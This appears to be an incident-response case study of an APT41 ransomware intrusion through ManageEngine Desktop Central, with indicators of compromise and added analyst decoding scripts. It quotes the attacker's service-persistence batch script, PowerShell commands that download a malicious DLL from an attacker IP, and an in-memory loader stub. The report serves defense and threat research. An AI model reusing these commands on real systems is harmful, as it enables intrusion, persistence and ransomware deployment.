APT41 — A SPY WHO STEALS OR A THIEF WHO SPIES


An advanced persistent threat (“APT”) is typically either a nation-state actor that aims
to benefit its state through sabotage, espionage, or industrial espionage, or a
cybercriminal that aims to steal money through theft, fraud, ransom or blackmail.


The Chinese-based threat actor APT41 blurs the lines: known to have run financially
motivated operations against the videogame industry as early as 2012, it gained notoriety
in 2013 when it started engaging in state-sponsored campaigns, notably the theft of
digital certificates which were later used to sign malware [1] [2].


Since December 2019, we have seen this threat actor exploiting vulnerabilities in products
such as ZOHO ManageEngine Desktop Central and Citrix Application Delivery Controller.
Within two to three weeks of the initial compromise, the final attack, the encryption of
systems, is launched and a ransom is demanded.


THE INVESTIGATION 


This case study is based on our most recent investigation into one of APT41’s operations 
against a major global nonprofit organization. Our client contacted us at the end of March 
2020 after discovering the ransom notes, shown in Figure 1, on several of its servers, 
some of which had been rendered inoperable. 


Hello. Your company's server hard drive was encrypted by us.
We use the most complex encryption algorithm (AES256).Only we can decrypt.

Please contact us: @privatemail.com
(Please check spam,Avoid missing mail)

Identification code: (Please tell us the identification code)

Please contact us and we will tell you the amount of ransom and how to pay.
(If the contact is fast, we will give you a discount.)

After the payment is successful, we will tell the decrypt password.
In order for you to believe in us, we have prepared the test server.Please contact us and we will tell the test server and decrypt the password.
Please do not scan encrypted hard drives or attempt to recover data.Prevent data corruption.

How to buy and pay for Bitcoin:
http://www.Localbitcoins.com
Or you can google search "How to buy Bitcoin"
If you know other trading websites better.

Tips:
If we don't respond in three days. Please contact an alternate mailbox: @cock.li
We will enable the alternate mailbox only if the first mailbox is not working properly.


Figure 1 Ransom note left on systems 


Initially, the ransom note looked like the ones left by the TimisoaraHackerTeam (see [3]
for an example of such a note). However, differences started to cast doubt on that
attribution.

Our client provided the virtual files of a server that had been encrypted. We examined it
and determined that:


• The threat actor used a commercial, off-the-shelf application, JetIco BestCrypt;
• The lateral movement to this computer originated on a domain controller;
• The system disk was left intact, the other drives were encrypted;
• The connection used a service account.


We then requested a forensic image of the domain controller. 


THE BASE 


Quickly, it became clear that that domain controller was the “base” from which the threat 
actor operated. 


In the logs, we identified a long, base64-encoded PowerShell script. While this is not
automatically malware, it does make us suspicious. We show the decoded string in
Figure 2. The reader will find the usual signs of maliciousness: several layers of encoding
and obfuscation. In this case, we had the following sequence: base64 → base64/gzip →
base64/xor.


$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("[base64-encoded, gzip-compressed payload; illegible in the source]"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();


Figure 2 Decoded PowerShell script found in logs 


Ultimately, the result is a binary string that contains executable code, which is copied to
memory and executed. This string is shown in Figure 3. It contains two important
indicators: the user agent string “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2;
Win64; x64; Trident/6.0)” and the IP address “176[.]123[.]3[.]104”.


Figure 3 Binary string copied to memory and executed 
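
The layer sequence described above (base64 → base64/gzip → base64/xor), peeled by an analyst-side decoder. This is an added example, not code from the original report: the report does not give the XOR key, so the sketch brute-forces a single-byte key, it assumes the outermost layer is UTF-16LE text as PowerShell's -EncodedCommand uses, and it runs on a constructed, inert sample with a documentation IP address.

```python
import base64
import gzip
import re

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")
USER_AGENT = re.compile(rb"Mozilla/[\x20-\x7e]{8,}")
IPV4 = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def longest_b64(layer: bytes) -> bytes:
    """Decode the longest base64 run embedded in one script layer."""
    runs = B64_RUN.findall(layer)
    if not runs:
        raise ValueError("no embedded base64 run in this layer")
    return base64.b64decode(max(runs, key=len))


def find_xor_key(blob: bytes):
    """Try all 256 single-byte keys; accept the one that exposes a User-Agent."""
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if USER_AGENT.search(plain):
            return key, plain
    raise ValueError("no single-byte XOR key exposes a User-Agent string")


def peel(logged_b64: str) -> dict:
    """base64 -> base64/gzip -> base64/xor, then extract network indicators."""
    # Assumption: the outermost layer decodes to UTF-16LE text, as with
    # PowerShell's -EncodedCommand; the report does not state this.
    layer1 = base64.b64decode(logged_b64).decode("utf-16-le").encode()
    layer2 = gzip.decompress(longest_b64(layer1))
    key, payload = find_xor_key(longest_b64(layer2))
    return {
        "xor_key": key,
        "user_agents": [m.decode() for m in USER_AGENT.findall(payload)],
        "ipv4": sorted({m.decode() for m in IPV4.findall(payload)}),
    }


def build_sample() -> str:
    """Constructed, inert bytes wrapped in the same three layers (test input)."""
    payload = (b"\x10\x00\x01\xfe" * 8
               + b"Mozilla/5.0 (compatible; constructed-sample)\x00"
               + b"\xa0\xb1" * 4 + b"192.0.2.10\x00" + b"\xff\x00" * 6)
    inner = base64.b64encode(bytes(b ^ 0x5A for b in payload)).decode()
    layer2 = f"$code = [Convert]::FromBase64String('{inner}')"
    gz = base64.b64encode(gzip.compress(layer2.encode())).decode()
    layer1 = f'$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("{gz}"))'
    return base64.b64encode(layer1.encode("utf-16-le")).decode()


if __name__ == "__main__":
    print(peel(build_sample()))
```

Nothing is executed at any stage: each layer is only decoded, and the final bytes are searched for the two indicator types the investigation recovered from the payload.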


In the same event log, we found a second PowerShell script with the exact same content,
except for the user agent string, which takes the new value “Mozilla/5.0
(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; BOIE9;ENUS)”.


The threat actor had achieved persistence through the use of a scheduled task called
“Windows Update Medic Service Daily” set to execute every day. At the time of the
acquisition, the executable was no longer present on the domain controller.


THE TOOLKIT 


On the same domain controller, we found several tools dropped by the attacker at various
stages of its attack. In addition to the JetIco BestEncryption, we identified a threaded
pinger called “MiPing” present in \Windows\SysWOW64, and a tunneling client similar to
netcat, called “NATBypass”, present in \PerfLogs. Interestingly, in the same PerfLogs
directory we found the PsExec.exe file. We have no evidence that the latter was executed.


The “MiPing” threaded pinger was executed in the early stages. It takes a list of 
destinations, either IP addresses or hostnames, and returns a file called “o.txt” that 
contains all the entries that responded. 


The evidence left on the server shows that the threat actor first dumped the computer
lists from Active Directory, then extracted the hostnames from that list, which were used
as the input to “MiPing”. The names present in the output file correlate with the evidence
of lateral movement present both on the servers and in the network logs.


The “NATBypass” tool creates a tunnel between two computers, bypassing all firewalls
and access controls. We correlated the execution on the domain controller with outbound
connections on TCP/53, to the same IP address “176[.]123[.]3[.]104”. The execution of
“NATBypass” also correlates with an RDP connection on the domain controller, indicating
that the threat actor likely used “NATBypass” to access the local server from the outside.


THE POINT OF ENTRY


In parallel to the analysis of the two systems above, our DFIR team deployed the VMware
Carbon Black Defense¹ agent on our client’s computers. On one machine, a virtual server
hosted in the cloud, the agent identified several malware files and communications with
the already known IP address “176[.]123[.]3[.]104”.


The first malware scans identified several files of interest, and an IOC scan identified 
several more. Among the malware and files identified are trojans identified as “SWRORT” 
and “DIPLE”, based on the penetration test framework CobaltStrike. 


In addition to executable files (EXE and DLL), the malware scan identified an HTML 
application (HTA), a batch script (BAT), and a cache file that belongs to the tool 
CERTUTIL, a native Microsoft application. 


CERTUTIL, when it downloads content from the Internet, creates two files: a “content”
file with the actual content and a “metadata” file that contains the information related to
the transfer. In our case, the metadata, shown in Figure 4, shows the URL from which
the malware file was retrieved, and provides another IP address “91[.]208[.]184[.]78”.


[earlier rows illegible in the source; ?? marks an unreadable byte]
00000060  00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00  ....$...........
00000070  00 b4 14 00 68 00 74 00 74 00 70 00 3a 00 2f 00  ....h.t.t.p.:./.
00000080  2f 00 39 00 31 00 2e 00 32 00 30 00 38 00 2e 00  /.9.1...2.0.8...
00000090  31 00 38 00 34 00 2e 00 37 00 38 00 2f 00 32 00  1.8.4...7.8./.2.
000000a0  2e 00 65 00 78 00 65 00 00 00 22 00 35 00 65 00  ..e.x.e...".5.e.
000000b0  36 00 37 00 ?? 00 66 00 ?? 00 38 00 2d 00 ?? 00  6.7.?.f.?.8.-.?.
000000c0  34 00 62 00 34 00 30 00 30 00 22 00 00 00        4.b.4.0.0."...

Figure 4 Metadata related to the malware content (certutil) 


A reference to the batch script is found in the artifacts from another native tool, the
Background Intelligent Transfer Service (BITS). Two files, of which one is shown in Figure
6, contain the URL from which the batch file was retrieved. This provides a third IP
address “66[.]42[.]98[.]220”, and the destination port 12345.


The content of the batch script is shown in Figure 5. Notably, it creates a service called 
“Storage Sync Service”, which calls the DLL “storesyncsvc.dll”, identified as malware. 
This, in effect, achieves persistence. 


1 https://www.carbonblack.com 


@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDLL" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"


Figure 5 Content of the batch script 


[earlier rows illegible in the source]
00000600  63 00 5c 00 42 00 49 00 54 00 33 00 42 00 41 00  c.\.B.I.T.3.B.A.
00000610  42 00 2e 00 74 00 6d 00 70 00 00 00 00 00 00 00  B...t.m.p.......
[...]
00000630  00 43 00 3a 00 5c 00 00 00 32 00 00 00 5c 00 5c  .C.:.\...2...\.\
00000640  00 3f 00 5c 00 56 00 6f 00 6c 00 75 00 6d 00 65  .?.\.V.o.l.u.m.e
[later rows illegible in the source]


Figure 6 BITS queue file
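
Figure 4 shows the download URL stored as UTF-16LE text inside the certutil metadata file, and Figure 6 shows wide strings in the BITS queue file that start on odd offsets. The carver below recovers such URLs from either artifact; it is an added example, not tooling from the original report, it does not parse either file format, and its sample buffers are constructed (zero-filled stand-in headers, documentation addresses, hypothetical file names).

```python
import ipaddress
import re
from urllib.parse import urlsplit

# "http://" or "https://" as UTF-16LE, then printable ASCII code units.
# Matching on raw bytes finds strings at odd offsets as well as even ones.
URL_UTF16 = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def is_ip(host) -> bool:
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def carve_urls(data: bytes) -> list:
    """Return every UTF-16LE http(s) URL in data with triage attributes."""
    found = []
    for m in URL_UTF16.finditer(data):
        url = m.group().decode("utf-16-le")
        try:
            parts = urlsplit(url)
            host, port = parts.hostname, parts.port
        except ValueError:          # damaged artifact: keep the raw string only
            host, port = None, None
        found.append({"offset": m.start(), "url": url, "host": host,
                      "host_is_ip": is_ip(host),
                      "odd_port": port not in (None, 80, 443)})
    return found


def worth_a_look(data: bytes) -> list:
    """URLs that point at a bare IP address or a non-standard port."""
    return [u["url"] for u in carve_urls(data) if u["host_is_ip"] or u["odd_port"]]


def utf16z(text: str) -> bytes:
    return text.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-ins: zero bytes replace the real headers, and the hosts are
# documentation addresses. The first URL sits at 0x74, as in Figure 4.
CERTUTIL_META = bytes(0x74) + utf16z("http://198.51.100.7/2.exe") + utf16z('"etag"')
BITS_QUEUE = (b"\x13" + bytes(6) + utf16z("C:\\Windows\\Temp\\BIT0000.tmp")
              + utf16z("http://203.0.113.5:12345/test/sample.bat")
              + utf16z("https://updates.example.com/a.cab"))

if __name__ == "__main__":
    for name, blob in (("certutil", CERTUTIL_META), ("bits", BITS_QUEUE)):
        for hit in carve_urls(blob):
            print(name, hex(hit["offset"]), hit["url"], hit["host_is_ip"], hit["odd_port"])
```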


The examination of the PowerShell event logs shows the same download we found in the 
BITS artifacts, as well as the download of the “storesyncsvc.dll” file, shown in Figure 7. 
The same logs show the execution or attempted execution of a PowerShell script called 
getcc.ps1, shown in Figure 8. This script was not present on the file system at the time 
of the acquisition. The argument contains the IP address “119[.]28[.]226[.]59”. 


Event number        : 18354
Creation time       : Mar 09, 2020 17:01:53.000000000 UTC
Written time        : Mar 09, 2020 17:01:53.000000000 UTC
Event level         : Information (4)
Computer name       :
Source name         : PowerShell
Event identifier    : 0x00000258 (600)
Number of strings   : 3
String: 1           : Alias
String: 2           : Started
String: 3           : ProviderName=Alias
    NewProviderState=Started
    SequenceNumber=1
    HostName=ConsoleHost
    HostVersion=4.0
    HostId=1f£78d09-7e08-4747-aal7?-66abfcec4f6b
    HostApplication=powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','c:\Windows\Temp\storesyncsvc.dll')
    EngineVersion=
    RunspaceId=
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=


Figure 7 Download of "storesyncsvc.dll"


Event number        : 18523
Creation time       : Mar 11, 2020 15:05:17.000000000 UTC
Written time        : Mar 11, 2020 15:05:17.000000000 UTC
Event level         : Information (4)
Computer name       :
Source name         : PowerShell
Event identifier    : 0x00000258 (600)
Number of strings   : 3
String: 1           : Alias
String: 2           : Started
String: 3           : ProviderName=Alias
    NewProviderState=Started
    SequenceNumber=1
    HostName=ConsoleHost
    HostVersion=4.0
    HostId=2a5e626a-9a3a-—491f-b57d-2£81622a9b33
    HostApplication=powershell -file getcc.ps1 1 http://119.28.226.59:5000/dd
    EngineVersion=
    RunspaceId=
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=


Figure 8 Execution of getcc.ps1
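
The two records above are PowerShell event 600 entries whose HostApplication field holds the full command line. The triage below applies that reading to a text dump of such records; it is an added example rather than tooling from the original report, the rule names are hypothetical, and the sample records are constructed with documentation addresses.

```python
import re

RULES = {
    "webclient_download": re.compile(r"Net\.WebClient|DownloadFile|DownloadString", re.I),
    "url_with_ip_host": re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I),
    "script_file_with_url_arg": re.compile(r"-file\s+\S+\.ps1\b.*https?://", re.I),
}
CREATED = re.compile(r"^\s*Creation time\s*:\s*(.+?)\s*$")
KEY_VALUE = re.compile(r"^\s*[A-Za-z]+=")


def parse_records(dump: str) -> list:
    """Split a text dump of event records; rejoin a wrapped HostApplication."""
    records = []
    for chunk in re.split(r"(?m)^\s*Event number\s*:\s*", dump)[1:]:
        lines = chunk.splitlines()
        rec = {"event": int(lines[0].strip()), "time": None, "host_app": ""}
        in_host_app = False
        for line in lines[1:]:
            when = CREATED.match(line)
            if when:
                rec["time"] = when.group(1)
            elif "HostApplication=" in line:
                rec["host_app"] = line.split("HostApplication=", 1)[1].strip()
                in_host_app = True
            elif KEY_VALUE.match(line):
                in_host_app = False      # next field ends the wrapped value
            elif in_host_app and line.strip():
                rec["host_app"] += " " + line.strip()
        records.append(rec)
    return records


def triage(dump: str) -> list:
    """Return (event number, time, matched rule names) for flagged records."""
    hits = []
    for rec in parse_records(dump):
        tags = sorted(n for n, rx in RULES.items() if rx.search(rec["host_app"]))
        if tags:
            hits.append((rec["event"], rec["time"], tags))
    return hits


# Constructed records in the layout of Figures 7 and 8 (documentation addresses).
SAMPLE = r"""
Event number      : 101
Creation time     : Mar 09, 2020 17:01:53 UTC
    HostApplication=powershell $client = new-object
    System.Net.WebClient;$client.DownloadFile('http://203.0.113.5:12345/t/a.dll','c:\Windows\Temp\a.dll')
    EngineVersion=
Event number      : 102
Creation time     : Mar 11, 2020 15:05:17 UTC
    HostApplication=powershell -file sample.ps1 1 http://198.51.100.7:5000/dd
Event number      : 103
Creation time     : Mar 11, 2020 15:09:02 UTC
    HostApplication=powershell -Command Get-ChildItem C:\Temp
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```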


THE INITIAL VECTOR OF COMPROMISE 


During the analysis of the point of entry, it became increasingly clear that ZOHO
ManageEngine Desktop Central had been abused: we found some of the malware files in
the “bin” directory of that application, and the PowerShell logs contain a command that
replaced some strings in the configuration file (Figure 9) and another that then restarted
the application (Figure 10).


Event number        : 18394
Creation time       : Mar 10, 2020 05:06:24.000000000 UTC
Written time        : Mar 10, 2020 05:06:24.000000000 UTC
Event level         : Information (4)
Computer name       :
Source name         : PowerShell
Event identifier    : 0x00000258
Number of strings   : 3
String: 1           : Alias
String: 2           : Started
String: 3           : ProviderName=Alias
    NewProviderState=Started
    SequenceNumber=1
    HostName=ConsoleHost
    HostVersion=4.0
    HostId=e4666afc-f14a-4e16-8a09-bcab9d43471la
    HostApplication=powershell -Command (gc 'powershell (Get-Process DesktopCentral).Path\..\..\webapps\DesktopCentral\WEB-INF\web.xml') -replace 'cewolf', 'patched' | Out-File -encoding ASCII 'powershell (Get-Process DesktopCentral).Path\..\..\webapps\DesktopCentral\WEB-INF\web.xml';
    EngineVersion=
    RunspaceId=
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=


Figure 9 Replacement of strings in the configuration file of ManageEngine Desktop Central


Event number        : 18402
Creation time       : Mar 10, 2020 05:06:27.000000000 UTC
Written time        : Mar 10, 2020 05:06:27.000000000 UTC
Event level         : Information
Computer name       :
Source name         : PowerShell
Event identifier    : 0x00000258
Number of strings   : 3
String: 1           : Alias
String: 2           : Started
String: 3           : ProviderName=Alias
    NewProviderState=Started
    SequenceNumber=1
    HostName=ConsoleHost
    HostVersion=4.0
    HostId=e2862263-cf61-4aed-90fd-e859986d72db
    HostApplication=powershell -Command net stop DesktopCentralServer ; net start DesktopCentralServer
    EngineVersion=
    RunspaceId=
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=


Figure 10 Restart of the Desktop Central service


LIFARS
your digital world, secured
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 info@lifars.com


However, we did not find anything that would explain how these came to be, at least not 
on the server itself. 


In our threat intel feeds, we found multiple references, for example [4] and [5], to two of
the IP addresses mentioned above. The corresponding articles had the same tools, the
same names and the same methodology as the one we were investigating. They also all
referred to CVE-2020-10189, which affects ZOHO ManageEngine Desktop Central before
version 10.0.474 [6]. In [5], FireEye attributes attacks with indicators identifiable to
APT41.


INDICATORS OF COMPROMISE


IOC    Type
176.123.3[.]104    IP
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; BOIE9;ENUS)    User-Agent string
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0)    User-Agent string
66.42.98[.]220    IP
74.82.201[.]8    IP
exchange.dumb1[.]com    Hostname
91[.]208[.]184[.]78    IP
119[.]28[.]226[.]59    IP
Storage Sync Service String 
Windows Update Medic Service Daily String 